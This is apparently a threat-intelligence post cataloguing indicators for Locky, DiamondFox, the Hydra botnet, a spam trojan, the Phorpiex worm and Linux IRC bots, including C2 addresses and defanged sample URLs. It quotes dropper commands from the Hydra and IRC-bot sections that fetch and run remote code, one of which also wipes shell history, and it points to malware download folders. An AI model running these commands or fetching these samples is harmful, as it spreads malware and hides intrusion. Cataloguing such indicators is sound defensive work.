Category: Uncategorized

eiqdfngoghledf.pw(Locky Ransomware Hosted In France ASN: 16276 OVH SAS)

Domains : eiqdfngoghledf.pw emijtrjhnrddoxr.org ofsrsykqd.pl whrilkltsrvggxsj.click fphnnnkaei.org ntdvwoousyc.pl kmarheql.info pobqrwoxltcy.pl eyetuesq.ru djxmxiahj.biz kdyoevbcxy.su ajqjdjblfdjti.work clsfnbwpekrxmcj.xyz qkpdsttc.pw ihxkjsgmloij.work rhiqtgs.info jbtnnvqkwakpitxk.pl awcweto.xyz URL’S : hxxp://93.170.131.108/submit.php hxxp://5.135.76.18/submit.php hxxp://82.146.37.200/submit.php Sample : hxxp://mundogostoso.com.br/zFN1Lg.exe Hosting infos : http://whois.domaintools.com/5.135.76.18

jcngtodnjlcr.it(Ransomware Locky Hosted In United Kingdom Belfast Barefruit Ltd.)

Domains : jcngtodnjlcr.it mneqmmunsee.us xdryy.uk awrobhtsxpmcro.tf boapooihhqkthvm.de gfyttdu.ru dpirlysijsbyy.pm whetujmpw.pm POSTs files to a webserver :    “POST /main.php HTTP/1.1     Host: 5.34.183.136 Sample : hxxp://bitmeyenkartusistanbul.com/system/logs/87h754/fXBvKHcBd.exe Hosting Infos : http://whois.domaintools.com/92.242.144.2

poweroftech.com(DiamondFox Hosted In Russian Federation Moscow Mediaserviceplus Ltd.)

Resolved : [ poweroftech.com ] To [ 193.0.200.89 ] Panel here : hxxp://poweroftech.com/poweroftech.com/soul/ Sample here : hxxp://www.gramer.pro/get/run.exe Other samples : hxxp://www.gramer.pro/get/ Diferent folders : hxxp://poweroftech.com/ Loader.bat : hxp://poweroftech.com/sin/  or direct link : hxxp://poweroftech.com/sin/loader.bat Hosting Infos : http://whois.domaintools.com/193.0.200.89

Hydra Botnet (Hosted In France Paris Hexatom)

Around 100 hydra bots inside. Server : 149.91.89.253:6667 Channel : #perls Url’s : hxxp://208.67.1.142/ddos.pl hxxp://208.67.1.142/hack/ u can get the rest of files here Binary.sh : cd /tmp && wget -q hxxp://208.67.1.142/hack/telmipsel && chmod +x telmipsel && ./telmipsel cd /tmp && wget -q hxxp://208.67.1.142/hack/telmips && chmod +x telmips && ./telmips cd /tmp && wget -q hxxp://208.67.1.142/hack/telsh4 &&

Trojan.GenericKD.3018192 (Hosted In Germany Falkenstein Hetzner Online Gmbh)

Email Spam  via these smtp servers : “cdptpa-pub-iedge-vip.email.rr.com” “smtp.orange.fr” “smtp.sina.com” “smtp.googlemail.com” “smtp.tiscali.co.uk” “out.alice.it” Servers used to spam : “173.194.195.16:25” “78.47.198.134:80” “62.24.139.11:25” “107.14.166.70:25” “193.252.22.86:25” “82.57.200.132:25” “202.108.6.242:25” Downloaded files : “GET /libeay32.dll HTTP/1.0 Host: 78.47.198.134 Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6 User-Agent: Mozilla/4.0 (compatible; Synapse)” “GET /ssleay32.dll HTTP/1.0 Host: 78.47.198.134 Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6 User-Agent:

Worm Porphiex

Domains used by the worm : “tuhocphp.net” “milomaine.org” “milwaukeearmedforcesweek.org” “millplainlibrary.org” “mimemoria.org” “militarytrial.org” “milesbuckinghamlaw.org” “millcreek-construction.org” “milpitasvoter.org” “milkingshadows.org” “millionairemakers.org” “millgroup.org” “mimedrive.org” “millriverwatershed.org” “minaple.org” “millercountyga.org” “milwaukeelandmarks.org” “milyonbabies.org” “military-law.org” “mindfullife.org” Servers used by the worm : “220.181.87.80:5050” “112.78.4.160:80” “213.186.33.5:25” “82.165.73.126:25” “199.34.228.68:25” “81.169.145.84:25” “184.168.221.20:25” “82.165.100.254:25” “92.61.157.100:25” “184.168.221.53:25” “173.255.220.88:25” “82.165.100.228:25” “184.168.221.76:25” “198.11.204.78:25” “143.95.43.78:25” “104.25.88.29:25” “74.208.60.100:25” “66.39.35.237:25” “50.63.202.34:25” “50.63.202.18:25” Downloaded files :

comment.dyn.mk(Linux Irc Bots Hosted In Korea, Republic Of Seoul Sk Broadband Co Ltd)

Resolved : [ comment.dyn.mk ] To [ 1.234.46.241 ] maybe hacked machine. $server = ‘comment.dyn.mk’ unless $server; my $port = ‘6667’; [11:00] * Now talking in #kill  (around 100 bots inside) [11:00] * Topic is ‘wget hxxp://cmt.ucoz.com/dyn.pdf;perl dyn.pdf;perl dyn.pdf;perl dyn.pdf;rm -rf dyn.pdf;history -c ‘ [11:00] * Set by anonplus on Thu Jan 07 17:06:34 U